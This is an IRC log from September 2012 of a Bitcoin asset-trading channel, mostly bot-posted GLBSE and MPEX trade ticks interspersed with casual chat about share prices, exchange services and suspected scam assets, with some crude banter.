alright, if you send me coins first I'll be happy to do it. Even better if they're mtgbtc Sep 27 23:48:55 [GLBSE] [GIGAMINING] 4 @ 0.5799 = 2.3196 BTC [+] Sep 27 23:52:08 [GLBSE] [GIGAMINING] 7 @ 0.5799 = 4.0593 BTC [+] Sep 27 23:56:48 [GLBSE] [FDBF] 10 @ 0.149252 = 1.4925 BTC [-] Sep 28 00:00:20 [GLBSE] [COGNITIVE] 1 @ 0.45000001 BTC [+] Sep 28 00:06:25 [GLBSE] [COGNITIVE] 1 @ 0.34999999 BTC [-] Sep 28 00:07:20 [MPEX] [F.GIGA.ETF] 2323 @ 0.00044037 = 1.023 BTC [+] Sep 28 00:07:21 [MPEX] [F.GIGA.ETF] 7412 @ 0.00044037 = 3.264 BTC [+] Sep 28 00:07:23 [MPEX] [S.BVPS] 100 @ 0.0034919 = 0.3492 BTC [+] Sep 28 00:08:21 [GLBSE] [BIF.P2P.LOANS] 1 @ 0.1 BTC [-] Sep 28 00:08:28 [GLBSE] [COGNITIVE] 1 @ 0.45000001 BTC [+] Sep 28 00:09:18 [GLBSE] [BIF.P2P.LOANS] 1 @ 0.01000001 BTC [-] Sep 28 00:12:26 [GLBSE] [COGNITIVE] 1 @ 0.32999999 BTC [-] Sep 28 00:14:43 [GLBSE] [MOORE] 2 @ 0.50099999 = 1.002 BTC [-] Sep 28 00:15:21 [GLBSE] [OBSI.HRPT] 8 @ 0.05999991 = 0.48 BTC [+] Sep 28 00:15:23 [GLBSE] [OBSI.HRPT] 14 @ 0.05999992 = 0.84 BTC [+] Sep 28 00:15:24 [GLBSE] [OBSI.HRPT] 28 @ 0.05999999 = 1.68 BTC [+] Sep 28 00:16:19 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 28 00:17:17 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 28 00:18:19 [GLBSE] [COGNITIVE] 1 @ 0.47000001 BTC [+] Sep 28 00:19:04 [GLBSE] [GSDPT] 1 @ 0.00336 BTC [-] Sep 28 00:24:47 [GLBSE] [GIGAMINING] 5 @ 0.5799 = 2.8995 BTC [+] Sep 28 00:25:21 [GLBSE] [COGNITIVE] 1 @ 0.32 BTC [-] Sep 28 00:26:13 [GLBSE] [OBSI.HRPT] 5 @ 0.058 = 0.29 BTC [-] Sep 28 00:28:03 [GLBSE] [OBSI.HRPT] 1 @ 0.058 BTC [-] Sep 28 00:28:06 Has anyone dealt with Bitcoins Direct? Sep 28 00:30:34 [GLBSE] [COGNITIVE] 1 @ 0.4 BTC [+] Sep 28 00:32:14 [GLBSE] [OBSI.HRPT] 5 @ 0.04600015 = 0.23 BTC [-] Sep 28 00:32:43 [MPEX] [F.GIGA.ETF] 4900 @ 0.00044037 = 2.1578 BTC [+] Sep 28 00:32:44 [MPEX] [F.GIGA.ETF] 2192 @ 0.00044037 = 0.9653 BTC [+] Sep 28 00:33:07 Bugpowder it's d&t's service. he's a hardass Sep 28 00:33:16 i'd be very much surprised if he runs with your money. Sep 28 00:33:39 Thanks, sounds like the best option for me. Sep 28 00:33:53 As long as he can accomodate the volume Sep 28 00:34:15 was recently announcing 1mn total usd turnover Sep 28 00:34:22 yeahhhh Sep 28 00:34:24 course it took him ~3 months to do it. Sep 28 00:34:25 should be ok Sep 28 00:34:54 I guess he has off market source of coins Sep 28 00:35:01 so should be fine, not dependent on gox Sep 28 00:39:17 [GLBSE] [SS] 10 @ 0.0175 = 0.175 BTC [-] Sep 28 00:46:11 ciuciu: are you sure it's relevant to keep calling mircea_popescu a pedophile? Sep 28 00:46:14 it seems like a bit of a stretch Sep 28 00:46:36 is moot a pedophile? Sep 28 00:46:41 or a furry? Sep 28 00:46:55 mmm furries Sep 28 00:47:20 moot is definitely gayfurry. Sep 28 00:58:31 [MPEX] [F.GIGA.ETF] 3600 @ 0.00044037 = 1.5853 BTC [+] Sep 28 00:58:33 [MPEX] [F.GIGA.ETF] 4228 @ 0.00044037 = 1.8619 BTC [+] Sep 28 01:03:15 [GLBSE] [OBSI.HRPT] 6 @ 0.0460002 = 0.276 BTC [+] Sep 28 01:03:16 [GLBSE] [OBSI.HRPT] 8 @ 0.04600015 = 0.368 BTC [-] Sep 28 01:03:17 [GLBSE] [OBSI.HRPT] 1 @ 0.04600014 BTC [-] Sep 28 01:03:19 [GLBSE] [OBSI.HRPT] 9 @ 0.04600009 = 0.414 BTC [-] Sep 28 01:03:20 [GLBSE] [OBSI.HRPT] 12 @ 0.04600008 = 0.552 BTC [-] Sep 28 01:03:21 [GLBSE] [OBSI.HRPT] 54 @ 0.04600001 = 2.484 BTC [-] Sep 28 01:04:53 http://www.youtube.com/watch?v=0bilaSB_tAE Sep 28 01:06:01 [GLBSE] [OBSI.HRPT] 7 @ 0.04600002 = 0.322 BTC [+] Sep 28 01:06:03 [GLBSE] [OBSI.HRPT] 17 @ 0.04600001 = 0.782 BTC [-] Sep 28 01:06:04 [GLBSE] [OBSI.HRPT] 90 @ 0.046 = 4.14 BTC [-] Sep 28 01:06:05 [GLBSE] [OBSI.HRPT] 1 @ 0.04509009 BTC [-] Sep 28 01:06:06 [GLBSE] [OBSI.HRPT] 2 @ 0.04509008 = 0.0902 BTC [-] Sep 28 01:06:07 [GLBSE] [OBSI.HRPT] 44 @ 0.04401787 = 1.9368 BTC [-] Sep 28 01:08:48 [GLBSE] [ASICMINER] 1 @ 0.11249999 BTC [-] Sep 28 01:09:45 I'm very jealous of larry david Sep 28 01:10:33 for tampon adventure with girlscout ?! Sep 28 01:11:06 yes, but also the skill he ahs at writing Sep 28 01:11:50 he recently did a short bit for the daily show, was great Sep 28 01:12:07 http://www.thedailyshow.com/watch/thu-september-6-2012/hope-and-change-2---barack-obama--it-could-have-been-worse Sep 28 01:21:09 hahah Sep 28 01:21:13 he is really good. Sep 28 01:21:23 he wrote most of the better seinfelds iirc Sep 28 01:23:50 [MPEX] [F.GIGA.ETF] 643 @ 0.00044037 = 0.2832 BTC [+] Sep 28 01:23:51 [MPEX] [F.GIGA.ETF] 473 @ 0.00044037 = 0.2083 BTC [+] Sep 28 01:23:52 [MPEX] [F.GIGA.ETF] 3800 @ 0.00044037 = 1.6734 BTC [+] Sep 28 01:23:53 [MPEX] [F.GIGA.ETF] 2534 @ 0.00044037 = 1.1159 BTC [+] Sep 28 01:32:23 [MPEX] [O.BTCUSD.C170N] 5 @ 0.1084107 = 0.5421 BTC [-] Sep 28 01:32:59 [MPEX] [S.MPOE] 48500 @ 0.00036349 = 17.6293 BTC [+] Sep 28 01:33:00 [MPEX] [S.MPOE] 22389 @ 0.00036492 = 8.1702 BTC [+] Sep 28 01:33:02 [MPEX] [S.MPOE] 58596 @ 0.00036493 = 21.3834 BTC [+] Sep 28 01:33:03 [MPEX] [S.MPOE] 58548 @ 0.00036541 = 21.394 BTC [+] Sep 28 01:33:03 [MPEX] [S.MPOE] 66111 @ 0.00036541 = 24.1576 BTC [+] Sep 28 01:33:04 [MPEX] [S.MPOE] 7900 @ 0.00036544 = 2.887 BTC [+] Sep 28 01:33:05 [MPEX] [S.MPOE] 28800 @ 0.00036566 = 10.531 BTC [+] Sep 28 01:33:07 [MPEX] [S.MPOE] 28094 @ 0.00036568 = 10.2734 BTC [+] Sep 28 01:33:08 [MPEX] [S.MPOE] 35100 @ 0.00036598 = 12.8459 BTC [+] Sep 28 01:33:09 [MPEX] [S.MPOE] 20839 @ 0.00036641 = 7.6356 BTC [+] Sep 28 01:33:10 [MPEX] [S.MPOE] 5123 @ 0.0003671 = 1.8807 BTC [+] Sep 28 01:38:24 Still looking for BIB.BVPS/S.BVPS shares. Anyone? Sep 28 01:42:26 [MPEX] [O.BTCUSD.C170N] 1 @ 0.10837131 BTC [-] Sep 28 02:07:38 [MPEX] [S.MPOE] 38977 @ 0.0003671 = 14.3085 BTC [+] Sep 28 02:07:40 [MPEX] [S.MPOE] 15823 @ 0.00036788 = 5.821 BTC [+] Sep 28 02:14:53 [GLBSE] [PUREMINING] 39 @ 0.10035 = 3.9137 BTC [-] Sep 28 02:16:27 [GLBSE] [PUREMINING] 1 @ 0.10025 BTC [-] Sep 28 02:18:40 [GLBSE] [GIGAMINING] 1 @ 0.561 BTC [-] Sep 28 02:18:41 [GLBSE] [GIGAMINING] 1 @ 0.55 BTC [-] Sep 28 02:18:42 [GLBSE] [GIGAMINING] 1 @ 0.54120002 BTC [-] Sep 28 02:32:59 [MPEX] [S.MPOE] 26743 @ 0.00036286 = 9.704 BTC [-] Sep 28 02:32:59 [MPEX] [S.MPOE] 6500 @ 0.0003623 = 2.355 BTC [-] Sep 28 02:33:01 [MPEX] [S.MPOE] 12704 @ 0.00036209 = 4.6 BTC [-] Sep 28 02:33:02 [MPEX] [S.MPOE] 11253 @ 0.00036166 = 4.0698 BTC [-] Sep 28 02:36:45 [GLBSE] [FPGAMINING] 1 @ 0.32000001 BTC [+] Sep 28 02:36:46 [GLBSE] [FPGAMINING] 45 @ 0.32 = 14.4 BTC [-] Sep 28 02:38:49 [GLBSE] [HYDRO.BONDS] 1 @ 1.3954 BTC [-] Sep 28 02:38:50 [GLBSE] [HYDRO.BONDS] 5 @ 1.3974 = 6.987 BTC [+] Sep 28 02:39:00 BTC-Mining, talk to rg Sep 28 02:40:48 [GLBSE] [HYDRO.BONDS] 3 @ 1.39749 = 4.1925 BTC [+] Sep 28 02:41:38 [GLBSE] [BMF] 1 @ 0.67957 BTC [+] Sep 28 02:41:45 He's not selling anymore S.BVPS shares I believe Sep 28 02:42:26 there is a passthrough on glbse i believe Sep 28 02:43:10 Yeah, But it lacks sellers Sep 28 02:43:24 BTC-Mining doesn't believe in market books Sep 28 02:43:50 [GLBSE] [ZETA-MINING] 2 @ 0.17785 = 0.3557 BTC [-] Sep 28 02:43:52 [GLBSE] [ZETA-MINING] 8 @ 0.17789 = 1.4231 BTC [+] Sep 28 02:45:18 I got orders but no one selling Sep 28 02:45:56 a Sep 28 02:46:00 !ticker s.bvps Sep 28 02:46:02 [MPEX:S.BVPS] 1day: 0.00343602 / 0.00345198 / 0.0034919 (350 shares, 1.21 BTC), 30day: 0.001175 / 0.00336628 / 0.003801 (31944 shares, 107.53 BTC) Sep 28 02:46:09 ya tiny volume on ot Sep 28 02:47:39 Just trying to find someone holding shares and see what they'd ask for it. Sep 28 02:47:51 [GLBSE] [GSDPT] 96 @ 0.0034 = 0.3264 BTC [+] Sep 28 02:47:53 They're apparently not around. Sep 28 02:48:19 i see asks at 35 Sep 28 02:48:32 then 37 and 39, 10k blocks Sep 28 02:49:33 Looks a bit of a steep price for my taste Sep 28 02:49:56 I was looking for 0.0030 - 0.0034 Sep 28 02:50:54 [GLBSE] [IBB] 1 @ 0.53989989 BTC [+] Sep 28 02:51:41 yea. the eternal dilemma, lock cash in the book or not. Sep 28 02:54:43 [GLBSE] [CPA] 1 @ 0.04799999 BTC [+] Sep 28 02:55:56 people were dumb Sep 28 02:56:00 when the asset was introduced Sep 28 02:56:06 it got pushed up to something like 0.01 Sep 28 02:56:09 now no one can sell Sep 28 02:56:14 cause that price was so unrealisti Sep 28 02:56:16 c Sep 28 02:56:31 so anyone who bought will have to take a major loss Sep 28 02:57:03 After every execution of order, CS would send you an email, this is really useful and convenient. Sep 28 02:57:06 they can;t be serious Sep 28 02:57:13 If forget, if options expire on the last Friday of the month ... that is 00:00 UTC Friday, or after 23:59:59 UTC Friday? Sep 28 02:57:25 sgornick end of last friday Sep 28 02:57:36 Thanks. Sep 28 02:57:41 "All options expire on the last minute of the last Friday of their month (UTC times)." Sep 28 02:57:55 So 24 hours. Cool. Sep 28 02:58:23 [MPEX] [S.MPOE] 2000 @ 0.00036166 = 0.7233 BTC [-] Sep 28 02:58:32 When the wiki is back online I'll add that. Sep 28 02:59:16 its offline atm !? Sep 28 02:59:38 [GLBSE] [OBSI.HRPT] 55 @ 0.04401787 = 2.421 BTC [-] Sep 28 02:59:39 [GLBSE] [OBSI.HRPT] 31 @ 0.04401786 = 1.3646 BTC [-] Sep 28 02:59:40 [GLBSE] [OBSI.HRPT] 17 @ 0.04382722 = 0.7451 BTC [-] Sep 28 02:59:41 [GLBSE] [OBSI.HRPT] 3 @ 0.04382721 = 0.1315 BTC [-] Sep 28 02:59:43 [GLBSE] [OBSI.HRPT] 6 @ 0.04354289 = 0.2613 BTC [-] Sep 28 03:01:05 [GLBSE] [RSM] 9 @ 0.29 = 2.61 BTC [+] Sep 28 03:01:06 rg did it ever go to .01 ? Sep 28 03:01:19 on glbse Sep 28 03:01:20 yea Sep 28 03:01:23 not mpex Sep 28 03:01:26 people are smarter on mpex Sep 28 03:01:35 o Sep 28 03:01:45 on glbse they were trading s.dice passthrough at 2x value Sep 28 03:01:49 highest on MPEX was 0.00380100 Sep 28 03:01:55 and we're currently 0.0035 Sep 28 03:02:10 hoping for a new high Sep 28 03:02:18 and it opened 22/24/26 iirc ? Sep 28 03:02:23 [GLBSE] [PUREASIC] 1 @ 0.82 BTC [+] Sep 28 03:02:24 yeah Sep 28 03:02:24 [GLBSE] [PUREASIC] 1 @ 0.825 BTC [+] Sep 28 03:02:25 oo Sep 28 03:02:27 seems reasonable. Sep 28 03:02:28 now would be a good time to get some MPOE Sep 28 03:02:41 i didn't see how low it was Sep 28 03:02:44 pity pirate has all your money :D Sep 28 03:02:56 arf Sep 28 03:03:47 [GLBSE] [ASICMINER] 1 @ 0.11432999 BTC [+] Sep 28 03:03:49 [GLBSE] [ASICMINER] 5 @ 0.11433 = 0.5717 BTC [+] Sep 28 03:03:54 [MPEX] [S.MPOE] 30180 @ 0.00036204 = 10.9264 BTC [+] Sep 28 03:03:56 [MPEX] [S.MPOE] 2500 @ 0.00036532 = 0.9133 BTC [+] Sep 28 03:03:57 [MPEX] [S.MPOE] 33760 @ 0.00036788 = 12.4196 BTC [+] Sep 28 03:03:58 [MPEX] [S.MPOE] 15200 @ 0.000368 = 5.5936 BTC [+] Sep 28 03:03:59 [MPEX] [S.MPOE] 3360 @ 0.00036875 = 1.239 BTC [+] Sep 28 03:04:11 cheers Sep 28 03:04:20 i'm off to bed. take care all. Sep 28 03:04:27 sweet dreams! Sep 28 03:04:46 :) (nohomo) **** BEGIN LOGGING AT Fri Sep 28 10:19:26 2012 Sep 28 10:26:32 [GLBSE] [NASTY] 12 @ 0.3699 = 4.4388 BTC [-] Sep 28 10:27:43 [GLBSE] [OBSI.HRPT] 4 @ 0.03765021 = 0.1506 BTC [-] Sep 28 10:27:45 [GLBSE] [OBSI.HRPT] 50 @ 0.035 = 1.75 BTC [-] Sep 28 10:27:46 [GLBSE] [OBSI.HRPT] 100 @ 0.034 = 3.4 BTC [-] Sep 28 10:27:47 [GLBSE] [OBSI.HRPT] 25 @ 0.032 = 0.8 BTC [-] Sep 28 10:27:49 [GLBSE] [OBSI.HRPT] 8 @ 0.03143792 = 0.2515 BTC [-] Sep 28 10:28:37 [GLBSE] [OBSI.HRPT] 1 @ 0.03 BTC [-] Sep 28 10:29:53 [GLBSE] [OBSI.HRPT] 1 @ 0.02516024 BTC [-] Sep 28 10:30:08 [MPEX] [F.GIGA.ETF] 1718 @ 0.00044037 = 0.7566 BTC [+] Sep 28 10:30:09 [MPEX] [F.GIGA.ETF] 382 @ 0.00044037 = 0.1682 BTC [+] Sep 28 10:31:02 [GLBSE] [OBSI.HRPT] 8 @ 0.02999999 = 0.24 BTC [+] Sep 28 10:31:03 [GLBSE] [OBSI.HRPT] 12 @ 0.03 = 0.36 BTC [+] Sep 28 10:32:04 [GLBSE] [OBSI.HRPT] 5 @ 0.03 = 0.15 BTC [+] Sep 28 10:32:05 [GLBSE] [OBSI.HRPT] 11 @ 0.02516024 = 0.2768 BTC [-] Sep 28 10:32:06 [GLBSE] [OBSI.HRPT] 10 @ 0.023 = 0.23 BTC [-] Sep 28 10:32:07 [GLBSE] [OBSI.HRPT] 100 @ 0.02 = 2 BTC [-] Sep 28 10:32:09 [GLBSE] [OBSI.HRPT] 2 @ 0.02 = 0.04 BTC [-] Sep 28 10:36:32 [GLBSE] [OBSI.HRPT] 3 @ 0.02 = 0.06 BTC [-] Sep 28 10:39:00 lol... OBSI now pays 0.00001 per day? instead of 0.001? Sep 28 10:39:05 It's down to 1% Sep 28 10:44:18 yup Sep 28 10:44:28 i'm glad i waited to close. Sep 28 10:44:51 shorting glbse is practically speaking free money. Sep 28 10:55:12 [MPEX] [S.MPOE] 1978 @ 0.00036277 = 0.7176 BTC [-] Sep 28 10:55:13 [MPEX] [S.MPOE] 37522 @ 0.00036247 = 13.6006 BTC [-] Sep 28 10:57:59 I think I'd better start doing that Sep 28 11:20:20 [MPEX] [S.MPOE] 7700 @ 0.00036247 = 2.791 BTC [-] Sep 28 11:45:47 [MPEX] [F.GIGA.ETF] 3700 @ 0.00044037 = 1.6294 BTC [+] Sep 28 11:45:48 [MPEX] [F.GIGA.ETF] 1800 @ 0.00044037 = 0.7927 BTC [+] Sep 28 11:52:34 [GLBSE] [OBSI.HRPT] 69 @ 0.02 = 1.38 BTC [-] Sep 28 12:06:50 [GLBSE] [BFLS.RIG] 4 @ 0.5 = 2 BTC [-] Sep 28 12:11:19 [MPEX] [F.GIGA.ETF] 3261 @ 0.00044037 = 1.436 BTC [+] Sep 28 12:11:19 [MPEX] [F.GIGA.ETF] 804 @ 0.00044037 = 0.3541 BTC [+] Sep 28 12:11:21 [MPEX] [S.MPOE] 8978 @ 0.00036247 = 3.2543 BTC [-] Sep 28 12:11:23 [MPEX] [S.MPOE] 2200 @ 0.00036228 = 0.797 BTC [-] Sep 28 12:12:35 [GLBSE] [ASICMINER] 1 @ 0.11349999 BTC [-] Sep 28 12:36:32 [MPEX] [S.MPOE] 17132 @ 0.00036166 = 6.196 BTC [-] Sep 28 12:36:34 [MPEX] [S.MPOE] 11400 @ 0.00036162 = 4.1225 BTC [-] Sep 28 12:36:35 [MPEX] [S.MPOE] 368 @ 0.00036139 = 0.133 BTC [-] Sep 28 12:36:52 [MPEX] [S.MPOE] 21522 @ 0.00036203 = 7.7916 BTC [+] Sep 28 12:36:54 [MPEX] [S.MPOE] 16005 @ 0.00036515 = 5.8442 BTC [+] Sep 28 12:36:55 [MPEX] [S.MPOE] 41887 @ 0.00036656 = 15.3541 BTC [+] Sep 28 12:36:56 [MPEX] [S.MPOE] 24800 @ 0.00036835 = 9.1351 BTC [+] Sep 28 12:36:57 [MPEX] [S.MPOE] 25540 @ 0.00036875 = 9.4179 BTC [+] Sep 28 12:36:59 [MPEX] [S.MPOE] 10246 @ 0.00036949 = 3.7858 BTC [+] Sep 28 12:39:16 [GLBSE] [NASTY] 1 @ 0.3699 BTC [-] Sep 28 12:58:11 [GLBSE] [ASICMINER] 4 @ 0.1135 = 0.454 BTC [+] Sep 28 13:02:04 [MPEX] [F.GIGA.ETF] 1100 @ 0.00044036 = 0.4844 BTC [-] Sep 28 13:11:32 [GLBSE] [GIGAMINING] 1 @ 0.55040001 BTC [+] Sep 28 13:11:33 [GLBSE] [GIGAMINING] 2 @ 0.5504 = 1.1008 BTC [-] Sep 28 13:11:35 [GLBSE] [GIGAMINING] 9 @ 0.5501 = 4.9509 BTC [-] Sep 28 13:11:36 [GLBSE] [GIGAMINING] 3 @ 0.55 = 1.65 BTC [-] Sep 28 13:11:37 [GLBSE] [GIGAMINING] 2 @ 0.5417 = 1.0834 BTC [-] Sep 28 13:11:38 [GLBSE] [GIGAMINING] 2 @ 0.54140001 = 1.0828 BTC [-] Sep 28 13:11:47 [GLBSE] [GIGAMINING] 3 @ 0.5414 = 1.6242 BTC [-] Sep 28 13:11:47 [GLBSE] [GIGAMINING] 2 @ 0.5413 = 1.0826 BTC [-] Sep 28 13:11:47 [GLBSE] [GIGAMINING] 1 @ 0.54100001 BTC [-] Sep 28 13:21:21 [GLBSE] [GIGAMINING] 1 @ 0.56999997 BTC [+] Sep 28 13:23:40 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 28 13:23:49 GIGAMINING [1@1BTC] paid: 0.46887596 BTC. Last price: 0.56999997 BTC. Capital gain: -0.43000003 BTC. Total: 0.03887593 BTC. (3.9%) Sep 28 13:24:38 Wow, actually still positive... it's amazing... Sep 28 13:24:52 BTC-Mining plenty of people went in at 1.5 tho Sep 28 13:25:10 it really only got back to pre-public listing prices in july i think Sep 28 13:25:18 Yeah... but if they calculated the price they could get mhash for vs price they pay on shares... Sep 28 13:25:30 They wouldn't be stuck with shares they overpaid. Sep 28 13:25:47 that may well be true, but pl is pl. Sep 28 13:26:16 !pl BTC-MINING 1 Sep 28 13:26:16 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 28 13:26:37 BTC-MINING [1@1BTC] paid: 0.27012647 BTC. Last price: 0.95999999 BTC. Capital gain: -0.04000001 BTC. Total: 0.23012646 BTC. (23%) Sep 28 13:26:37 [GLBSE] [GIGAMINING] 1 @ 0.56999997 BTC [+] Sep 28 13:27:07 [MPEX] [S.MPOE] 13700 @ 0.00036949 = 5.062 BTC [+] Sep 28 13:28:44 [GLBSE] [TEEK.A] 1 @ 0.87497999 BTC [+] Sep 28 13:31:15 [GLBSE] [MOORE] 2 @ 0.49000001 = 0.98 BTC [+] Sep 28 13:33:45 [GLBSE] [MOORE] 1 @ 0.49000001 BTC [+] Sep 28 13:47:22 [GLBSE] [ASICMINER] 4 @ 0.1135 = 0.454 BTC [+] Sep 28 13:52:35 [MPEX] [F.GIGA.ETF] 4600 @ 0.00044037 = 2.0257 BTC [+] Sep 28 13:52:37 [MPEX] [S.MPOE] 2913 @ 0.00036229 = 1.0554 BTC [-] Sep 28 13:52:38 [MPEX] [S.MPOE] 51232 @ 0.00036139 = 18.5147 BTC [-] Sep 28 13:52:39 [MPEX] [S.MPOE] 9155 @ 0.00036136 = 3.3083 BTC [-] Sep 28 13:52:47 [GLBSE] [GIGAMINING] 1 @ 0.56999997 BTC [+] Sep 28 13:54:18 https://bitcointalk.org/index.php?topic=112900.0 this is possibly the funniest thing to date Sep 28 13:54:35 a holding company for btc mining bonds which buys lottery tickets with the dividend proceeds. Sep 28 14:17:43 [MPEX] [S.MPOE] 2091 @ 0.00036136 = 0.7556 BTC [-] Sep 28 14:17:56 [GLBSE] [ASICMINER] 15 @ 0.11434 = 1.7151 BTC [+] Sep 28 14:37:20 [GLBSE] [ASICMINER] 9 @ 0.11434 = 1.0291 BTC [+] Sep 28 14:42:51 [MPEX] [F.GIGA.ETF] 5000 @ 0.00044037 = 2.2019 BTC [+] Sep 28 14:42:52 [MPEX] [F.GIGA.ETF] 3180 @ 0.00044037 = 1.4004 BTC [+] Sep 28 14:42:54 [MPEX] [F.GIGA.ETF] 2620 @ 0.00044037 = 1.1538 BTC [+] Sep 28 14:56:14 [GLBSE] [ASICMINER] 12 @ 0.11434 = 1.3721 BTC [+] Sep 28 15:04:31 [GLBSE] [KRAKEN] 5 @ 0.0088 = 0.044 BTC [+] Sep 28 15:07:54 [MPEX] [F.GIGA.ETF] 1000 @ 0.00044036 = 0.4404 BTC [-] Sep 28 15:07:55 [MPEX] [F.GIGA.ETF] 600 @ 0.00044036 = 0.2642 BTC [-] Sep 28 15:07:57 [MPEX] [F.GIGA.ETF] 1097 @ 0.00044036 = 0.4831 BTC [-] Sep 28 15:07:58 [MPEX] [F.GIGA.ETF] 5403 @ 0.00044036 = 2.3793 BTC [-] Sep 28 15:10:27 [GLBSE] [OBSI.HRPT] 69 @ 0.015 = 1.035 BTC [-] Sep 28 15:19:01 [GLBSE] [OBSI.HRPT] 1 @ 0.02368999 BTC [+] Sep 28 15:20:45 [GLBSE] [OBSI.HRPT] 10 @ 0.02369 = 0.2369 BTC [+] Sep 28 15:22:03 [GLBSE] [ABM] 1 @ 0.4 BTC [-] Sep 28 15:22:33 [GLBSE] [ABM] 1 @ 0.10000001 BTC [-] Sep 28 15:23:40 [GLBSE] [OBSI.HRPT] 8 @ 0.03 = 0.24 BTC [+] Sep 28 15:25:56 [GLBSE] [DI.BFLSC.FAIL] 80 @ 0.001 = 0.08 BTC [+] Sep 28 15:26:19 [GLBSE] [ASICMINER] 2 @ 0.11434 = 0.2287 BTC [+] Sep 28 15:30:34 [GLBSE] [GREEN] 2 @ 0.4 = 0.8 BTC [+] Sep 28 15:32:58 [MPEX] [S.MPOE] 53300 @ 0.00036136 = 19.2605 BTC [-] Sep 28 15:50:50 [GLBSE] [RSM] 4 @ 0.285 = 1.14 BTC [-] Sep 28 15:50:51 [GLBSE] [RSM] 2 @ 0.28 = 0.56 BTC [-] Sep 28 15:50:52 [GLBSE] [RSM] 1 @ 0.27 BTC [-] Sep 28 15:50:53 [GLBSE] [RSM] 3 @ 0.267 = 0.801 BTC [-] Sep 28 15:52:03 LOTTOMINING LMFAO Sep 28 15:52:27 just another ponzi Sep 28 15:52:46 you can better burn your bitcoin Sep 28 15:52:56 (if they could burn) Sep 28 15:53:53 the chance of winning a lottery is 0 Sep 28 15:54:11 so dividend will be 0 Sep 28 15:54:15 nice Sep 28 15:54:40 why cant I issue such a scammy asset? Sep 28 15:54:48 BECAUSE I AM NO SCAMMER Sep 28 15:55:01 [GLBSE] [BBBB] 2 @ 0.00016 = 0.0003 BTC [-] Sep 28 15:55:51 [GLBSE] [NASTY] 10 @ 0.3699 = 3.699 BTC [-] Sep 28 15:56:03 ::seen nefario Sep 28 15:56:11 ;;seen nefario Sep 28 15:56:11 nefario was last seen in #bitcoin-assets 3 days, 16 hours, 56 minutes, and 15 seconds ago: Those assets are not listed or traded anymore Sep 28 15:56:27 damn Sep 28 15:57:34 [GLBSE] [ASICMINER] 1 @ 0.11423999 BTC [-] Sep 28 15:58:21 [MPEX] [S.MPOE] 27200 @ 0.00036456 = 9.916 BTC [+] Sep 28 15:58:23 [MPEX] [S.MPOE] 6600 @ 0.00036555 = 2.4126 BTC [+] Sep 28 15:58:34 https://bitcointalk.org/index.php?topic=112900.msg1228080#msg1228080 Sep 28 16:05:57 [GLBSE] [PUREMINING] 5 @ 0.10025 = 0.5013 BTC [-] Sep 28 16:06:56 [GLBSE] [GMVT-BOT] 1 @ 0.11000001 BTC [-] Sep 28 16:08:16 [GLBSE] [GMVT-BOT] 1 @ 0.11 BTC [-] Sep 28 16:08:41 ok thanks Sep 28 16:08:56 but YOU see my point dont you? Sep 28 16:09:22 i do! Sep 28 16:10:09 [GLBSE] [GMVT-BOT] 6 @ 0.1 = 0.6 BTC [-] Sep 28 16:10:53 [GLBSE] [SILVER] 10 @ 0.00911003 = 0.0911 BTC [-] Sep 28 16:15:03 :D thought so Sep 28 16:23:29 lol Sep 28 16:25:05 [MPEX] [S.MPOE] 34200 @ 0.00036683 = 12.5456 BTC [+] Sep 28 16:26:25 do you value each CO/madinvestor diverent, I want to buy the cheapest lol Sep 28 16:26:36 *different Sep 28 16:28:15 hahahah Sep 28 16:28:51 [GLBSE] [GIGAMINING] 1 @ 0.56999999 BTC [+] Sep 28 16:28:54 ;;ticker Sep 28 16:28:54 Best bid: 12.2001, Best ask: 12.20979, Bid-ask spread: 0.00969, Last trade: 12.2, 24 hour volume: 22822, 24 hour low: 12.12, 24 hour high: 12.3785 Sep 28 16:31:26 [GLBSE] [GIGAMINING] 3 @ 0.56999998 = 1.71 BTC [-] Sep 28 16:32:18 [GLBSE] [GIGAMINING] 1 @ 0.56999997 BTC [-] Sep 28 16:33:12 lol Sep 28 16:33:18 hmmn sounds intresting ;) Sep 28 16:33:26 [GLBSE] [GIGAMINING] 1 @ 0.569 BTC [-] Sep 28 16:33:35 got great collectors value :D Sep 28 16:33:41 whahahaha Sep 28 16:35:13 [GLBSE] [COGNITIVE] 1 @ 0.51989999 BTC [+] Sep 28 16:36:34 [GLBSE] [COGNITIVE] 1 @ 0.51999999 BTC [+] Sep 28 16:38:33 [GLBSE] [KRAKEN] 50 @ 0.0088 = 0.44 BTC [+] Sep 28 16:39:43 [GLBSE] [KRAKEN] 1 @ 0.0088 BTC [+] Sep 28 16:44:51 [GLBSE] [MMM] 2 @ 0.7 = 1.4 BTC [-] Sep 28 16:45:54 [GLBSE] [MMM] 3 @ 0.72 = 2.16 BTC [+] Sep 28 16:46:51 obsi could buy the bonds back at 105% SO 105% of 0.02 is still a huge Ka-ching for obsi Sep 28 16:47:14 without even breaking his contract Sep 28 16:47:57 wow scammy fuckers that is a huge gap in the market ;) Sep 28 16:48:13 [GLBSE] [MMM] 1 @ 0.8 BTC [+] Sep 28 16:51:22 [MPEX] [F.GIGA.ETF] 3508 @ 0.00044036 = 1.5448 BTC [-] Sep 28 17:11:56 [GLBSE] [NASTY] 4 @ 0.3699 = 1.4796 BTC [-] Sep 28 17:13:43 usagi: hes buying back at IPO price anyhow Sep 28 17:13:50 unless someone is stupid enough to sell below that Sep 28 17:14:05 usagi: and jesus fucking christ dude Sep 28 17:14:10 keep all your bmf shit in one thread Sep 28 17:15:54 Maybe obsi is pushing it down Sep 28 17:16:05 Luceo: you cant without burning money Sep 28 17:17:03 Im pretty sure he is, but I might be wrong Sep 28 17:17:05 [MPEX] [F.GIGA.ETF] 2500 @ 0.00044037 = 1.1009 BTC [+] Sep 28 17:17:53 I vaguely remember saying he was Sep 28 17:18:49 yeah thought so too, and abmo got a last div of 0.1 Sep 28 17:19:54 yeah Sep 28 17:19:59 maybe that doesnt cover hrpt too Sep 28 17:23:22 usagi: btw, CPA is dissolved now, right? Sep 28 17:26:08 Wait what? Sep 28 17:30:52 Diablo-D3: Why is CPA dissolved? Sep 28 17:31:09 I dunno, too much shit has happened over the past few days Sep 28 17:31:13 maybe Im confused Sep 28 17:32:11 [GLBSE] [OBSI.HRPT] 7 @ 0.02 = 0.14 BTC [-] Sep 28 17:32:12 [GLBSE] [OBSI.HRPT] 1 @ 0.01530001 BTC [-] Sep 28 17:32:13 [GLBSE] 